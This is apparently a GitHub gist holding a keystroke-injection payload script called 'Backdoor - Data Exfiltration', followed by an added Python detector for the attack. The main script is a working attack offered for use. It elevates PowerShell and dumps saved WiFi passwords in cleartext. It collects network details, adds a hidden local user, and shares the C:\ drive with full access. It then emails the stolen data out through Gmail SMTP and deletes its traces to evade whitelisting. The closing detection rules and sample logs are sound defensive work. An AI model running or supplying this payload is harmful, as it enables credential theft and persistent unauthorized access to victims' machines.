@YourFriendCaspian
Last active December 8, 2019 19:11
REM:***************************************************
Rem:# Backdoor - Data Exfiltration
Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner
REM:This simple script will grab all of the wifi passwords, external IP address, LAN address,
REM:and hostname of the target device and e-mail it to an address of your choice.
REM:I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc...
REM:It then creates a user called Microsoft, and shares C:\ out to the new user.
REM:My goal here was to use one liners to prevent this from being picked up by whitelisting
REM:applications (no .bat, .exe, etc...)
REM:***************************************************
CustomDelay:1000
Press:131+100
CustomDelay:450
Press:131+114
CustomDelay:450
Print:powershell Start-Process powershell -Verb runAs
CustomDelay:30
Press:176
CustomDelay:500
Press:130+121
CustomDelay:1000
Rem:***************************************************
Rem:# We're going to grab all wifi passwords
Rem:***************************************************
Print:(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\\Information.txt
Press:176
CustomDelay:500
Rem:***************************************************
Rem:# Now we'll grab Network Information (Local IP, Public IP, Hostname)
Rem:***************************************************
Print:$command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}
Press:176
CustomDelay:60
Print:$command.InvokeReturnAsIs() | Out-File C:\\Information.txt -Append
Press:176
CustomDelay:400
Rem:***************************************************
Rem:# We're going to add a user
Rem:***************************************************
Print:NET USER Microsoft \"l33t\" /ADD
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Now we're going to share the C:\ drive out
Rem:***************************************************
Print:New-SmbShare -Name \"Microsoft\" -Path \"C:\\\" -FullAccess \"Microsoft\"
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Let's e-mail ourselves and clean up
Rem:***************************************************
CustomDelay:1000
Print:$SMTPServer = 'smtp.gmail.com'
Press:176
Print:$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
Press:176
Print:$SMTPInfo.EnableSSL = $true
Press:176
Print:$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!')
Press:176
Print:$ReportEmail = New-Object System.Net.Mail.MailMessage
Press:176
Print:$ReportEmail.From = 'EMAILHERE'
Press:176
Print:$ReportEmail.To.Add('EMAILHERE')
Press:176
Print:$ReportEmail.Subject = 'Hello from the duck'
Press:176
Print:$ReportEmail.Body = (Get-Content C:\\Information.txt | out-string)
Press:176
Print:$SMTPInfo.Send($ReportEmail)
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Cleanup
Rem:***************************************************
Print:del C:\\Information.txt
Press:176
Print:exit
Press:176
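From the defender's side, the sequence above leaves a recognisable trail in process-creation and PowerShell script-block logs: a wlan profile dump with key=clear, an external IP lookup, a local user added, and the system drive shared, all within seconds of each other. The following detector is an added example, not part of the gist; the rule names, the correlation window and the event records (Sysmon-style fields 'ts', 'host', 'cmdline') are constructed for illustration.

```python
import re

# Each rule keys on one behaviour the payload exhibits. Patterns are constructed
# for this example and are applied to command-line / script-block text.
RULES = {
    "powershell_elevation":  re.compile(r"Start-Process\s+powershell\s+-Verb\s+runAs", re.I),
    "wifi_profile_key_dump": re.compile(r"netsh\s+wlan\s+show\s+profile.*key=clear", re.I),
    "external_ip_lookup":    re.compile(r"ipinfo\.io", re.I),
    "local_user_added":      re.compile(r"\bnet\s+user\b.*\s/add\b", re.I),
    "root_drive_shared":     re.compile(r'New-SmbShare\b.*-Path\s+"?C:\\"?(\s|$)', re.I),
}

def classify(cmdline):
    """Names of every rule matching one command line (empty list if none)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(events, window_s=120, min_rules=3):
    """Correlate rule hits per host.

    events: iterable of dicts with 'ts' (epoch seconds), 'host', 'cmdline'.
    Returns {host: {'hits': [(ts, rule), ...], 'chain': bool}}; 'chain' is set
    when at least min_rules distinct rules fire on one host inside window_s,
    the short burst a keystroke-injection device produces."""
    per_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule in classify(ev["cmdline"]):
            per_host.setdefault(ev["host"], []).append((ev["ts"], rule))
    result = {}
    for host, hits in per_host.items():
        chain = False
        for t0, _ in hits:
            names = {r for t, r in hits if t0 <= t <= t0 + window_s}
            if len(names) >= min_rules:
                chain = True
                break
        result[host] = {"hits": hits, "chain": chain}
    return result

# Constructed sample log records: one host hit by the payload, one with a
# routine admin action that must not trigger the chain alert.
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "WS01", "cmdline": "powershell Start-Process powershell -Verb runAs"},
    {"ts": 1003, "host": "WS01", "cmdline": 'netsh wlan show profile name="HomeNet" key=clear'},
    {"ts": 1005, "host": "WS01", "cmdline": 'NET USER Microsoft "PLACEHOLDER" /ADD'},
    {"ts": 1006, "host": "WS01", "cmdline": 'New-SmbShare -Name "Microsoft" -Path "C:\\" -FullAccess "Microsoft"'},
    {"ts": 5000, "host": "WS02", "cmdline": "net user helpdesk /add"},
]

if __name__ == "__main__":
    for host, r in scan(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if r["chain"] else "isolated", [n for _, n in r["hits"]])
```

A single `net user /add` is routine on many networks; the value of the correlation is the burst of distinct behaviours on one host, which is also why the 4720 (user created) and 5142 (share created) Security events are worth forwarding alongside Sysmon.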